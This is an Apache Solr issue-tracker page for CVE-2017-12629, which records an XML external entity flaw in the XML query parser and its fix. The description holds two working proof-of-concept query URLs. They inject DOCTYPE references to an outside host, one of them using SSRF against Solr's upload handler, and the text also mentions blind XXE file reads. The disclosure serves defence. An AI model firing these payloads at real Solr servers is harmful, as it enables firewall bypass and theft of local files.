Uploaded image for project: 'Solr'
  1. Solr
  2. SOLR-11477

CVE-2017-12629: Disable external entities in XML query parser

    Details

    • Type: Task
    • Status: Closed
    • Priority: Blocker
    • Resolution: Fixed
    • Affects Version/s: None
    • Fix Version/s: 5.5.5, 6.6.2, 7.1, 7.2, master (8.0)
    • Component/s: query parsers, security
    • Security Level: Public (Default Security Level. Issues are Public)
    • Labels:
      None

      Description

      Lucene includes a query parser that is able to create the full-spectrum of Lucene queries, using an XML data structure. Starting from version 5.1 Solr supports "xml" query parser in the search query.

      The problem is that lucene xml parser does not explicitly prohibit doctype declaration and expansion of external entities. It is possible to include special entities in the xml document, that point to external files (via file://) or external urls (via http://):

      Example usage:

      http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/xxx"><a></a>'}
      

      When Solr is parsing this request, it makes a HTTP request to http://xxx.s.artsploit.com/xxx and treats its content as DOCTYPE definition.

      Considering that we can define parser type in the search query, which is very often comes from untrusted user input, e.g. search fields on websites. It allows to an external attacker to make arbitrary HTTP requests to the local SOLR instance and to bypass all firewall restrictions.

      For example, this vulnerability could be user to send malicious data to the '/upload' handler:

      http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true"'><a></a>'}
      

      This vulnerability can also be exploited as Blind XXE using ftp wrapper in order to read arbitrary local files from the solrserver.

        Attachments

        1. SOLR-11477.patch
          12 kB
          Christine Poerschke
        2. SOLR-11477.patch
          12 kB
          Christine Poerschke
        3. SOLR-11477.patch
          13 kB
          Christine Poerschke
        4. SOLR-11477.patch
          11 kB
          Uwe Schindler
        5. SOLR-11477.patch
          11 kB
          Uwe Schindler
        6. SOLR-11477.patch
          13 kB
          Christine Poerschke
        7. SOLR-11477.patch
          5 kB
          Christine Poerschke
        8. SOLR-11477.patch
          11 kB
          Uwe Schindler
        9. SOLR-11477.patch
          7 kB
          Christine Poerschke

          Activity

            People

            • Assignee:
              thetaphi Uwe Schindler
              Reporter:
              cpoerschke Christine Poerschke
            • Votes:
              0 Vote for this issue
              Watchers:
              5 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: